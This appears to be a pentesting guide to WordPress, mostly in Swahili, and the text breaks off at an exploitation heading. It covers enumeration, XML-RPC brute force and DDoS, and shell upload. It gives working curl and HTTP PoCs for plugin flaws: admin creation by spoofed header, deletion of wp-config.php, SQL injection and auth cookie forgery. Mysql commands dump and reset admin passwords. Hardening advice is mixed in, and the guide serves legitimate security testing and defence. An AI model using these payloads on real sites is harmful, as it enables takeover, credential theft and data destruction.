Wordpress

Reading time: 26 minutes

Taarifa za Msingi

• Uploaded files go to: http://10.10.10.10/wp-content/uploads/2018/08/a.txt

• Themes files can be found in /wp-content/themes/, hivyo ukibadilisha baadhi ya php ya theme ili kupata RCE huenda utatumia path hiyo. Kwa mfano: Using theme twentytwelve unaweza access faili 404.php katika: /wp-content/themes/twentytwelve/404.php

• Another useful url could be: /wp-content/themes/default/404.php

• Katika wp-config.php unaweza kupata root password ya database.

• Default login paths to check: /wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/

Main WordPress Files

• index.php
• license.txt ina taarifa muhimu kama toleo la WordPress lililosanidiwa.
• wp-activate.php inatumiwa kwa mchakato wa activation kwa email wakati wa kuanzisha tovuti mpya ya WordPress.
• Login folders (may be renamed to hide it):
• /wp-admin/login.php
• /wp-admin/wp-login.php
• /login.php
• /wp-login.php
• xmlrpc.php ni faili inayowakilisha feature ya WordPress inayoruhusu data kusafirishwa kwa kutumia HTTP kama transport mechanism na XML kama encoding mechanism. Aina hii ya mawasiliano imebadilishwa na WordPress REST API.
• Folder ya wp-content ni saraka kuu ambapo plugins na themes zinahifadhiwa.
• wp-content/uploads/ ni saraka ambapo faili zote zilizopakiwa kwenye platform zinahifadhiwa.
• wp-includes/ ni saraka ambapo core files zinahifadhiwa, kama certificates, fonts, JavaScript files, na widgets.
• wp-sitemap.xml Katika WordPress versions 5.5 na baadaye, WordPress huunda faili ya sitemap XML yenye machapisho yote ya umma na post types na taxonomies zinazoweza kuulizwa hadharani.

Post exploitation

• Faili ya wp-config.php ina taarifa zinazohitajika na WordPress kuunganishwa na database kama jina la database, database host, username na password, authentication keys and salts, na database table prefix. Faili hii ya configuration pia inaweza kutumiwa kuwasha DEBUG mode, ambayo inaweza kusaidia katika troubleshooting.

Users Permissions

• Administrator
• Editor: Huchapisha na kusimamia machapisho yake na ya wengine
• Author: Huchapisha na kusimamia machapisho yake mwenyewe
• Contributor: Anaandika na kusimamia machapisho yake lakini hawezi kuyachapisha
• Subscriber: Vichapisho vya kivinjari na kuhariri profile yao

Passive Enumeration

Get WordPress version

Angalia kama unaweza kupata faili /license.txt au /readme.html

Ndani ya source code ya ukurasa (mfano kutoka https://wordpress.org/support/article/pages/):

• grep

curl https://victim.com/ | grep 'content="WordPress'

• meta name

• CSS link files

• JavaScript files

Pata Plugins

curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

Pata Mandhari

curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

Kutoa matoleo kwa ujumla

curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

Uorodheshaji wa Kivitendo

Plugins and Themes

Huenda hautaweza kugundua Plugins and Themes zote zinazowezekana. Ili kuwagundua zote, utahitaji kivitendo Brute Force orodha ya Plugins and Themes (kwa bahati nzuri kwetu kuna zana za kiotomatiki ambazo zinajumuisha orodha hizi).

Watumiaji

• ID Brute: Unapata watumiaji halali kutoka kwenye tovuti ya WordPress kwa Brute Forcing IDs za watumiaji:

curl -s -I -X GET http://blog.example.com/?author=1

Iwapo majibu ni 200 au 30X, hiyo ina maana id ni halali. Ikiwa jibu ni 400, basi id ni batili.

• wp-json: Unaweza pia kujaribu kupata taarifa kuhusu watumiaji kwa kuuliza:

curl http://blog.example.com/wp-json/wp/v2/users

Endpoint mwingine wa /wp-json/ ambao unaweza kufichua baadhi ya taarifa kuhusu watumiaji ni:

curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL

Note that this endpoint only exposes users that have made a post. Only information about the users that has this feature enable will be provided.

Also note that /wp-json/wp/v2/pages could leak IP addresses.

• Login username enumeration: Wakati wa kuingia kwenye /wp-login.php message huwa tofauti, ikionyesha ikiwa username ipo au la.

XML-RPC

Ikiwa xml-rpc.php inafanya kazi unaweza kufanya credentials brute-force au kuitumia kuanzisha mashambulizi ya DoS kwa rasilimali nyingine. (You can automate this process using this for example).

To see if it is active try to access to /xmlrpc.php and send this request:

Angalia

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

Credentials Bruteforce

wp.getUserBlogs, wp.getCategories au metaWeblog.getUsersBlogs ni baadhi ya mbinu ambazo zinaweza kutumika ku-brute-force credentials. Ikiwa unaweza kupata yoyote ya hizi unaweza kutuma kitu kama:

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>

Ujumbe "Jina la mtumiaji au nywila si sahihi" ndani ya 200 code response unapaswa kuonekana ikiwa credentials sio sahihi.

Kwa kutumia credentials sahihi unaweza kupakia faili. Katika response, path itaonekana (https://gist.github.com/georgestephanis/5681982)

<?xml version='1.0' encoding='utf-8'?>
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>username</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>name</name>
<value><string>filename.jpg</string></value>
</member>
<member>
<name>type</name>
<value><string>mime/type</string></value>
</member>
<member>
<name>bits</name>
<value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

Pia kuna njia ya haraka zaidi ya brute-force credentials kwa kutumia system.multicall kwani unaweza kujaribu credentials kadhaa katika ombi moja:

Bypass 2FA

Njia hii imelengwa kwa programu na si watu, ni ya zamani, kwa hiyo haitegemei 2FA. Kwa hivyo, ikiwa una creds halali lakini mlango mkuu umehifadhiwa na 2FA, huenda ukaweza kutumia xmlrpc.php kuingia ukitumia creds hizo na kuepuka 2FA. Kumbuka hutakuwa na uwezo wa kufanya vitendo vyote unavyoweza kupitia console, lakini bado huenda ukaweza kufikia RCE kama Ippsec anavyoelezea katika https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s

DDoS or port scanning

Ikiwa unaweza kupata method pingback.ping ndani ya orodha, unaweza kuifanya Wordpress itume ombi lolote kwa host/port yoyote.
Hii inaweza kutumika kuomba maelfu ya Wordpress sites kufikia eneo moja (kwa hivyo DDoS itasababisha eneo hilo) au unaweza kuitumia kufanya Wordpress iscan mtandao wa ndani (unaweza kuainisha port yoyote).

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>

Ikiwa unapata faultCode yenye thamani kubwa zaidi kuliko 0 (17), ina maana port iko wazi.

Angalia matumizi ya system.multicall katika sehemu iliyopita ili kujifunza jinsi ya kuitumia vibaya ili kusababisha DDoS.

DDoS

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://target/</string></value></param>
<param><value><string>http://yoursite.com/and_some_valid_blog_post_url</string></value></param>
</params>
</methodCall>

wp-cron.php DoS

Faili hii kawaida huwa ndani ya root ya tovuti ya Wordpress: /wp-cron.php
Wakati faili hii inapotumiwa, huanzishwa "heavy" MySQL query, hivyo inaweza kutumika na attackers kusababisha DoS.
Pia, kwa default, wp-cron.php inaitwa kila wakati ukurasa unapopakiwa (mara zote mteja anapoomba ukurasa wowote wa Wordpress), jambo ambalo kwenye tovuti zenye trafiki kubwa linaweza kusababisha matatizo (DoS).

Inashauriwa kuzima Wp-Cron na kuunda cronjob halisi ndani ya host ambayo itaendesha vitendo vinavyohitajika kwa vipindi vya kawaida (bila kusababisha matatizo).

/wp-json/oembed/1.0/proxy - SSRF

Jaribu kufikia https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net na tovuti ya Worpress inaweza kutuma ombi kwako.

This is the response when it doesn't work:

SSRF

https://github.com/t0gu/quickpress/blob/master/core/requests.go

Chombo hiki kinakagua kama methodName: pingback.ping na njia /wp-json/oembed/1.0/proxy zipo; ikiwa zipo, hujaribu ku-exploit.

Zana za Otomatiki

cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
#You can try to bruteforce the admin user using wpscan with "-U admin"

Pata ufikiaji kwa kubadilisha bit

Zaidi ya kuwa shambulio halisi, hili ni jambo la ajabu. Katika CTF https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man ulingeweza kubadilisha bit 1 kwenye faili yoyote ya wordpress. Hivyo ulingeweza kubadilisha nafasi 5389 ya faili /var/www/html/wp-includes/user.php ili ku-NOP operesheni ya NOT (!).

if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
return new WP_Error(

Paneli RCE

Kubadilisha php ya theme inayotumika (admin credentials needed)

Appearance → Theme Editor → 404 Template (kwa upande wa kulia)

Badilisha maudhui kwa php shell:

Tafuta mtandaoni jinsi ya kufikia ukurasa uliosasishwa. Katika kesi hii unapaswa kufikia hapa: http://10.11.1.234/wp-content/themes/twentytwelve/404.php

MSF

Unaweza kutumia:

use exploit/unix/webapp/wp_admin_shell_upload

kupata session.

Plugin RCE

PHP plugin

Inawezekana kupakia faili .php kama plugin.
Tengeneza php backdoor yako kwa mfano:

Kisha ongeza plugin mpya:

Pakia plugin na bonyeza Install Now:

Bonyeza Procced:

Inawezekana hili halitaonekana kufanya chochote, lakini ukienda Media, utaona shell yako imepakizwa:

Fikia na utaona URL ya kutekeleza reverse shell:

Uploading and activating malicious plugin

Njia hii inahusisha usakinishaji wa plugin hatari inayoonekana kuwa na uharibifu na inaweza kutumika kupata web shell. Mchakato huu unafanyika kupitia WordPress dashboard kama ifuatavyo:

1. Plugin Acquisition: Plugin hupatikana kutoka chanzo kama Exploit DB kama here.
2. Plugin Installation:

• Navigate to the WordPress dashboard, then go to Dashboard > Plugins > Upload Plugin.
• Pakia faili la zip la plugin uliopakua.

3. Plugin Activation: Mara plugin imefanikiwa kusakinishwa, inapaswa kuamshwa kupitia dashboard.
4. Exploitation:

• Ukiwa na plugin "reflex-gallery" imewekwa na kuamshwa, inaweza kutumika kwa sababu inajulikana kuwa vulnerable.
• Metasploit framework inatoa exploit kwa kudumu hili. Kwa kuingiza module inayofaa na kutekeleza amri maalum, session ya meterpreter inaweza kuanzishwa, ikitoa ufikiaji usioidhinishwa kwenye tovuti.
• Inatambuliwa kuwa hii ni mojawapo tu ya njia nyingi za kuchuja tovuti ya WordPress.

Yaliyomo yanajumuisha msaada wa picha unaoonyesha hatua kwenye WordPress dashboard za kusakinisha na kuamsha plugin. Hata hivyo, ni muhimu kutambua kuwa kutumia udhaifu kwa njia hii ni kinyume cha sheria na si ya maadili bila ruhusa sahihi. Taarifa hii inapaswa kutumika kwa uwajibikaji na tu katika muktadha wa kisheria, kama pentesting yenye idhini wazi.

For more detailed steps check: https://www.hackingarticles.in/wordpress-reverse-shell/

From XSS to RCE

• WPXStrike: WPXStrike ni script iliyoundwa kuinua uvunjaji wa Cross-Site Scripting (XSS) hadi Remote Code Execution (RCE) au uwapo wa udhaifu mwingine mkali katika WordPress. Kwa maelezo zaidi angalia this post. Inatoa support for Wordpress Versions 6.X.X, 5.X.X and 4.X.X. and allows to:
• Privilege Escalation: Inaunda user katika WordPress.
• (RCE) Custom Plugin (backdoor) Upload: Pakia custom plugin yako (backdoor) kwenye WordPress.
• (RCE) Built-In Plugin Edit: Hariri Built-In Plugins katika WordPress.
• (RCE) Built-In Theme Edit: Hariri Built-In Themes katika WordPress.
• (Custom) Custom Exploits: Custom Exploits kwa Third-Party WordPress Plugins/Themes.

Post Exploitation

Chukua usernames na passwords:

mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"

Badilisha admin password:

mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"

Wordpress Plugins Pentest

Uso wa Mashambulizi

Kujua jinsi plugin ya Wordpress inaweza kufichua utendaji ni muhimu ili kupata udhaifu katika utendaji wake. Unaweza kuona jinsi plugin inaweza kufichua utendaji katika pointi zifuatazo na baadhi ya mifano ya plugins zilizo na udhaifu katika this blog post.

• wp_ajax

Moja ya njia ambazo plugin inaweza kufichua kazi kwa watumiaji ni kupitia AJAX handlers. Hizi zinaweza kuwa na mende za mantiki, idhinishaji, au uthibitishaji. Zaidi ya hayo, ni jambo la kawaida kwamba kazi hizi zitategemea uthibitishaji na idhinishaji kwa kuwepo kwa wordpress nonce ambayo mtumiaji yoyote aliyethibitishwa kwenye mfumo wa Wordpress anaweza kuwa nayo (bila kujali jukumu lake).

These are the functions that can be used to expose a function in a plugin:

add_action( 'wp_ajax_action_name', array(&$this, 'function_name'));
add_action( 'wp_ajax_nopriv_action_name', array(&$this, 'function_name'));

Matumizi ya nopriv hufanya endpoint ipatikane kwa watumiaji wote (hata wale wasiojidhinishwa).

• REST API

Pia inawezekana kufichua functions kutoka wordpress kwa kusajili REST API kwa kutumia function register_rest_route:

register_rest_route(
$this->namespace, '/get/', array(
'methods' => WP_REST_Server::READABLE,
'callback' => array($this, 'getData'),
'permission_callback' => '__return_true'
)
);

The permission_callback ni callback — function inayokagua kama mtumiaji fulani ameidhinishwa kuita API method.

Ikiwa function ya built-in __return_true itatumiwa, itapuuza ukaguzi wa ruhusa za mtumiaji.

• Direct access to the php file

Bila shaka, Wordpress inatumia PHP na faili ndani ya plugins zinapatikana moja kwa moja kutoka kwenye web. Hivyo, ikiwa plugin inafichua functionality yoyote iliyo na udhaifu ambayo inasababisha tu kwa kufikia faili hiyo, itakuwa inaweza kutumiwa na mtumiaji yeyote.

Trusted-header REST impersonation (WooCommerce Payments ≤ 5.6.1)

Baadhi ya plugins hufanya “trusted header” shortcuts kwa internal integrations au reverse proxies kisha hutumia header hiyo kuweka muktadha wa mtumiaji wa sasa kwa REST requests. Ikiwa header haifungwi kwa njia ya kriptografia kwenye request na component ya upstream, mshambuliaji anaweza kuiga header hiyo (spoof) na kufikia privileged REST routes kama administrator.

• Athari: kupanuka kwa ruhusa bila uthibitisho hadi admin kwa kuunda administrator mpya kupitia core users REST route.
• Example header: X-Wcpay-Platform-Checkout-User: 1 (inalazimisha user ID 1, kwa kawaida akaunti ya kwanza ya administrator).
• Exploited route: POST /wp-json/wp/v2/users with an elevated role array.

PoC

POST /wp-json/wp/v2/users HTTP/1.1
Host: <WP HOST>
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
X-Wcpay-Platform-Checkout-User: 1
Content-Length: 114

{"username": "honeypot", "email": "wafdemo@patch.stack", "password": "demo", "roles": ["administrator"]}

Kwa nini inafanya kazi

• Plugin inafananisha header inayodhibitiwa na mteja na hali ya uthibitisho na inaruka ukaguzi wa capability.
• WordPress core inatarajia uwezo wa create_users kwa route hii; plugin hack inaukwepa kwa kuweka moja kwa moja muktadha wa current user kutoka kwa header.

Vionyeshi vya mafanikio vinavyotarajiwa

• HTTP 201 na JSON body inayobainisha user iliyoundwa.
• Admin user mpya inaonekana katika wp-admin/users.php.

Orodha ya kugundua

• Grep kwa ajili ya getallheaders(), $_SERVER['HTTP_...'], au vendor SDKs zinazosomea custom headers ili kuweka muktadha wa mtumiaji (mfano, wp_set_current_user(), wp_set_auth_cookie()).
• Pitia REST registrations kwa callbacks zenye privileged actions ambazo hazina ukaguzi thabiti wa permission_callback na badala yake zinategemea request headers.
• Angalia matumizi ya core user-management functions (wp_insert_user, wp_create_user) ndani ya REST handlers ambazo zinazuia tu kwa thamani za header.

Kuimarisha usalama

• Usipatikane uthibitisho au idhini kutoka kwa headers zinazodhibitiwa na mteja.
• Ikiwa reverse proxy inapaswa kuingiza identity, ifunge trust kwenye proxy na futa nakala za inbound (mfano, unset X-Wcpay-Platform-Checkout-User kwenye edge), kisha pita token iliyosainiwa na uiweke wazi server-side.
• Kwa REST routes zinazofanya vitendo vya privileged, sitauli ukaguzi wa current_user_can() na tumia permission_callback kali (USITUMIE __return_true).
• Tumia uthibitisho wa first-party (cookies, application passwords, OAuth) badala ya “impersonation” kupitia header.

References: ona viungo mwishoni mwa ukurasa huu kwa kesi ya umma na uchambuzi mpana.

Unauthenticated Arbitrary File Deletion via wp_ajax_nopriv (Litho Theme <= 3.0)

WordPress themes and plugins frequently expose AJAX handlers through the wp_ajax_ and wp_ajax_nopriv_ hooks. When the nopriv variant is used the callback becomes reachable by unauthenticated visitors, so any sensitive action must additionally implement:

1. A capability check (e.g. current_user_can() or at least is_user_logged_in()), and
2. A CSRF nonce validated with check_ajax_referer() / wp_verify_nonce(), and
3. Strict input sanitisation / validation.

The Litho multipurpose theme (< 3.1) forgot those 3 controls in the Remove Font Family feature and ended up shipping the following code (simplified):

function litho_remove_font_family_action_data() {
if ( empty( $_POST['fontfamily'] ) ) {
return;
}
$fontfamily = str_replace( ' ', '-', $_POST['fontfamily'] );
$upload_dir = wp_upload_dir();
$srcdir  = untrailingslashit( wp_normalize_path( $upload_dir['basedir'] ) ) . '/litho-fonts/' . $fontfamily;
$filesystem = Litho_filesystem::init_filesystem();

if ( file_exists( $srcdir ) ) {
$filesystem->delete( $srcdir, FS_CHMOD_DIR );
}
die();
}
add_action( 'wp_ajax_litho_remove_font_family_action_data',        'litho_remove_font_family_action_data' );
add_action( 'wp_ajax_nopriv_litho_remove_font_family_action_data', 'litho_remove_font_family_action_data' );

Masuala yaliyotolewa na kipande hiki cha msimbo:

• Unauthenticated access – hook ya wp_ajax_nopriv_ imeandikishwa.
• No nonce / capability check – mgeni yeyote anaweza kufikia endpoint.
• No path sanitisation – kamba ya fontfamily inayodhibitiwa na mtumiaji inaunganishwa na njia ya filesystem bila kuchujwa, ikiruhusu traversal ya kawaida ya ../../.

Uvamizi

Mshambuliaji anaweza kufuta faili au saraka yoyote chini ya saraka ya msingi ya uploads (kawaida <wp-root>/wp-content/uploads/) kwa kutuma ombi moja la HTTP POST:

curl -X POST https://victim.com/wp-admin/admin-ajax.php \
-d 'action=litho_remove_font_family_action_data' \
-d 'fontfamily=../../../../wp-config.php'

Kwa sababu wp-config.php iko nje ya uploads, mfululizo wa ../ mara nne unatosha kwenye installation chaguomsingi. Kufuta wp-config.php kunalazimisha WordPress kuingia kwenye mwongozo wa ufungaji kwenye ziara inayofuata, na kuwezesha kuchukua udhibiti wa tovuti nzima (mshambuliaji anatoa tu usanidi mpya wa DB na kuunda admin user).

Malengo mengine yenye athari ni plugin/theme .php files (kuharibu security plugins) au sheria za .htaccess.

Orodha ya ugunduzi

• Iwapo callback yoyote ya add_action( 'wp_ajax_nopriv_...') inaita filesystem helpers (copy(), unlink(), $wp_filesystem->delete(), n.k.).
• Kuunganisha ingizo la mtumiaji lisilosafishwa ndani ya njia za faili (angalia $_POST, $_GET, $_REQUEST).
• Kukosekana kwa check_ajax_referer() na current_user_can()/is_user_logged_in().

Kuimarisha

function secure_remove_font_family() {
if ( ! is_user_logged_in() ) {
wp_send_json_error( 'forbidden', 403 );
}
check_ajax_referer( 'litho_fonts_nonce' );

$fontfamily = sanitize_file_name( wp_unslash( $_POST['fontfamily'] ?? '' ) );
$srcdir = trailingslashit( wp_upload_dir()['basedir'] ) . 'litho-fonts/' . $fontfamily;

if ( ! str_starts_with( realpath( $srcdir ), realpath( wp_upload_dir()['basedir'] ) ) ) {
wp_send_json_error( 'invalid path', 400 );
}
// … proceed …
}
add_action( 'wp_ajax_litho_remove_font_family_action_data', 'secure_remove_font_family' );
//  🔒  NO wp_ajax_nopriv_ registration

Privilege escalation kupitia urejeshaji wa stale role na missing authorization (ASE "View Admin as Role")

Plugins nyingi zinaweka kipengele cha "view as role" au kubadilisha role kwa muda kwa kuhifadhi role(s) asilia katika user meta ili ziweze kurejeshwa baadaye. Ikiwa njia ya urejesho inategemea tu request parameters (mfano, $_REQUEST['reset-for']) na orodha inayotunzwa na plugin bila kuangalia capabilities na valid nonce, hili linakuwa vertical privilege escalation.

Mfano wa ulimwengu halisi ulipatikana katika Admin and Site Enhancements (ASE) plugin (≤ 7.6.2.1). Reset branch ilirejesha roles kulingana na reset-for=<username> ikiwa jina la mtumiaji lilionekana katika array ya ndani $options['viewing_admin_as_role_are'], lakini haikufanya either check ya current_user_can() wala verification ya nonce kabla ya kuondoa current roles na kuirudia kuingiza roles zilizohifadhiwa kutoka user meta _asenha_view_admin_as_original_roles:

// Simplified vulnerable pattern
if ( isset( $_REQUEST['reset-for'] ) ) {
$reset_for_username = sanitize_text_field( $_REQUEST['reset-for'] );
$usernames = get_option( ASENHA_SLUG_U, [] )['viewing_admin_as_role_are'] ?? [];

if ( in_array( $reset_for_username, $usernames, true ) ) {
$u = get_user_by( 'login', $reset_for_username );
foreach ( $u->roles as $role ) { $u->remove_role( $role ); }
$orig = (array) get_user_meta( $u->ID, '_asenha_view_admin_as_original_roles', true );
foreach ( $orig as $r ) { $u->add_role( $r ); }
}
}

Kwa nini inaweza kutumiwa

• Inaamini $_REQUEST['reset-for'] na chaguo la plugin bila idhini upande wa seva.
• Ikiwa mtumiaji hapo awali alikuwa na ruhusa za juu zilizohifadhiwa katika _asenha_view_admin_as_original_roles na alipopunguzwa, anaweza kuzirejesha kwa kutembelea njia ya kuweka upya.
• Katika baadhi ya utolewaji, mtumiaji yeyote aliyethibitishwa anaweza kusababisha kuweka upya kwa jina la mtumiaji mwingine ambalo bado lipo katika viewing_admin_as_role_are (idhinishaji limevunjika).

Masharti ya shambulio

• Toleo la plugin lenye udhaifu na kipengele kimewezeshwa.
• Akaunti lengwa ina jukumu la juu lisilotumika lililohifadhiwa katika user meta kutokana na matumizi ya awali.
• Kikao chochote kilichothibitishwa; hakuna nonce/capability katika mtiririko wa reset.

Utekelezaji (mfano)

# While logged in as the downgraded user (or any auth user able to trigger the code path),
# hit any route that executes the role-switcher logic and include the reset parameter.
# The plugin uses $_REQUEST, so GET or POST works. The exact route depends on the plugin hooks.
curl -s -k -b 'wordpress_logged_in=...' \
'https://victim.example/wp-admin/?reset-for=<your_username>'

Kwenye builds zilizo hatarini hili hufuta roles za sasa na kurejesha roles za awali zilizohifadhiwa (mfano, administrator), kwa ufanisi ikiongeza mamlaka.

Detection checklist

• Tafuta vipengele vya kubadili roles vinavyohifadhi “original roles” katika user meta (mfano, _asenha_view_admin_as_original_roles).
• Tambua njia za reset/restore ambazo:
• Soma majina ya watumiaji kutoka $_REQUEST / $_GET / $_POST.
• Badilisha roles kupitia add_role() / remove_role() bila current_user_can() na wp_verify_nonce() / check_admin_referer().
• Ruhusu kwa kuzingatia array ya chaguo la plugin (mfano, viewing_admin_as_role_are) badala ya uwezo wa mhusika.

Hardening

• Tekeleza ukaguzi wa uwezo kwenye kila tawi linalobadilisha hali (mfano, current_user_can('manage_options') au ngumu zaidi).
• Lazimisha nonces kwa mabadiliko yote ya role/idhini na uyathibitishe: check_admin_referer() / wp_verify_nonce().
• Usiwamini kamwe majina ya watumiaji yanayotolewa na request; tafuta mtumiaji lengwa upande wa server kulingana na mwendeshaji aliye thibitishwa na sera wazi.
• Futa hali ya “original roles” kwenye masasisho ya wasifu/role ili kuepuka kurejeshwa kwa ruhusa za juu zilizokuwa za zamani:

add_action( 'profile_update', function( $user_id ) {
delete_user_meta( $user_id, '_asenha_view_admin_as_original_roles' );
}, 10, 1 );

• Fikiria kuhifadhi hali ndogo tu na kutumia tokens zenye muda wa uhalali, zilizo na ulinzi wa capability kwa ajili ya kubadilisha role kwa muda.

Kuongezeka kwa mamlaka bila uthibitisho kupitia cookie‑trusted user switching kwenye public init (Service Finder “sf-booking”)

Plugins fulani huunganisha user-switching helpers kwenye public init hook na huchota utambulisho kutoka kwa cookie inayodhibitiwa na mteja. Ikiwa code inaita wp_set_auth_cookie() bila kuthibitisha authentication, capability na nonce halali, mgeni yeyote asiyethibitishwa anaweza kulazimisha kuingia kama user ID yoyote.

Mfano wa kawaida wenye hatari (umerahisishwa kutoka Service Finder Bookings ≤ 6.1):

function service_finder_submit_user_form(){
if ( isset($_GET['switch_user']) && is_numeric($_GET['switch_user']) ) {
$user_id = intval( sanitize_text_field($_GET['switch_user']) );
service_finder_switch_user($user_id);
}
if ( isset($_GET['switch_back']) ) {
service_finder_switch_back();
}
}
add_action('init', 'service_finder_submit_user_form');

function service_finder_switch_back() {
if ( isset($_COOKIE['original_user_id']) ) {
$uid = intval($_COOKIE['original_user_id']);
if ( get_userdata($uid) ) {
wp_set_current_user($uid);
wp_set_auth_cookie($uid);  // 🔥 sets auth for attacker-chosen UID
do_action('wp_login', get_userdata($uid)->user_login, get_userdata($uid));
setcookie('original_user_id', '', time() - 3600, '/');
wp_redirect( admin_url('admin.php?page=candidates') );
exit;
}
wp_die('Original user not found.');
}
wp_die('No original user found to switch back to.');
}

Kwa nini inaweza kutumika

• Hook ya umma ya init inafanya mshughulikiaji kupatikana kwa watumiaji wasiothibitishwa (hakuna is_user_logged_in() guard).
• Utambulisho umetokana na cookie inayoweza kubadilishwa na mteja (original_user_id).
• Kiito cha moja kwa moja cha wp_set_auth_cookie($uid) kinaingia muombaji kama mtumiaji huyo bila ukaguzi wowote wa capability/nonce.

Utekelezaji (bila kuidhinishwa)

GET /?switch_back=1 HTTP/1.1
Host: victim.example
Cookie: original_user_id=1
User-Agent: PoC
Connection: close

Mambo ya kuzingatia ya WAF kwa WordPress/plugin CVEs

WAF za generic za edge/server zimepangwa kwa mifumo pana (SQLi, XSS, LFI). Mapungufu mengi yenye athari kubwa katika WordPress/plugin ni mende za logic/auth maalum za programu ambazo huonekana kama trafiki isiyo hatari isipokuwa engine itakapoelewa routes za WordPress na semantics za plugin.

Offensive notes

• Lenga endpoints maalum za plugin kwa payloads safi: admin-ajax.php?action=..., wp-json/<namespace>/<route>, custom file handlers, shortcodes.
• Fanya kwanza njia zisizo na uthibitisho (AJAX nopriv, REST with permissive permission_callback, public shortcodes). Default payloads mara nyingi hufanikiwa bila obfuscation.
• Mifano ya kawaida yenye athari kubwa: privilege escalation (broken access control), arbitrary file upload/download, LFI, open redirect.

Defensive notes

• Usitegemee saini za generic za WAF kulinda plugin CVEs. Tekeleza virtual patches maalum kwenye application-layer au sasisha haraka.
• Tumia positive-security checks katika code (capabilities, nonces, strict input validation) badala ya negative regex filters.

Ulinzi wa WordPress

Sasisho za kawaida

Hakikisha WordPress, plugins, na themes zimeboreshwa hadi toleo jipya. Pia thibitisha kuwa automated updating imewezeshwa katika wp-config.php:

define( 'WP_AUTO_UPDATE_CORE', true );
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );

Pia, weka tu plugins na themes za WordPress za kuaminika.

Plugins za Usalama

• Wordfence Security
• Sucuri Security
• iThemes Security

Mapendekezo mengine

• Ondoa mtumiaji wa chaguo-msingi admin
• Tumia nywila zenye nguvu na 2FA
• Mara kwa mara kagua ruhusa za watumiaji
• Punguza idadi ya jaribio la kuingia ili kuzuia mashambulizi ya Brute Force
• Badilisha jina la faili wp-admin.php na ruhusu ufikiaji ndani tu au kutoka kwa anwani za IP maalum.

SQL Injection bila uthibitisho kupitia uhakiki usio wa kutosha (WP Job Portal <= 2.3.2)

Plugin ya uajiri ya WP Job Portal ilifunua kazi ya savecategory ambayo hatimaye inatekeleza msimbo wenye udhaifu ufuatao ndani ya modules/category/model.php::validateFormData():

$category  = WPJOBPORTALrequest::getVar('parentid');
$inquery   = ' ';
if ($category) {
$inquery .= " WHERE parentid = $category ";   // <-- direct concat ✗
}
$query  = "SELECT max(ordering)+1 AS maxordering FROM "
. wpjobportal::$_db->prefix . "wj_portal_categories " . $inquery; // executed later

Masuala yaliyoletwa na kipande hiki:

1. Ingizo la mtumiaji lisilosafishwa – parentid linatokana moja kwa moja na ombi la HTTP.
2. Ujunganishaji wa string ndani ya WHERE clause – hakuna matumizi ya is_numeric() / esc_sql() au prepared statement.
3. Upatikanaji bila uthibitisho – ingawa kitendo kinatekelezwa kupitia admin-post.php, ukaguzi pekee uliopo ni CSRF nonce (wp_verify_nonce()), ambao mtembeleaji yeyote anaweza kuupata kutoka kwenye ukurasa wa umma unaojumuisha shortcode [wpjobportal_my_resumes].

Utekelezwaji

1. Pata nonce mpya:

curl -s https://victim.com/my-resumes/ | grep -oE 'name="_wpnonce" value="[a-f0-9]+' | cut -d'"' -f4

2. Ingiza SQL ya hiari kwa kuutumia vibaya parentid:

curl -X POST https://victim.com/wp-admin/admin-post.php \
-d 'task=savecategory' \
-d '_wpnonce=<nonce>' \
-d 'parentid=0 OR 1=1-- -' \
-d 'cat_title=pwn' -d 'id='

Majibu yanafunua matokeo ya query iliyowekwa au yanabadilisha database, kuthibitisha SQLi.

Unauthenticated Arbitrary File Download / Path Traversal (WP Job Portal <= 2.3.2)

Kazi nyingine, downloadcustomfile, iliwaruhusu wageni kupakua faili yoyote kwenye diski kwa kupitia path traversal. Sink iliyo hatarishi iko katika modules/customfield/model.php::downloadCustomUploadedFile():

$file = $path . '/' . $file_name;
...
echo $wp_filesystem->get_contents($file); // raw file output

$file_name ni attacker-controlled na imeunganishwa bila kusafishwa. Tena, kizuizi pekee ni CSRF nonce ambayo inaweza kupatikana kwenye ukurasa wa resume.

Exploitation

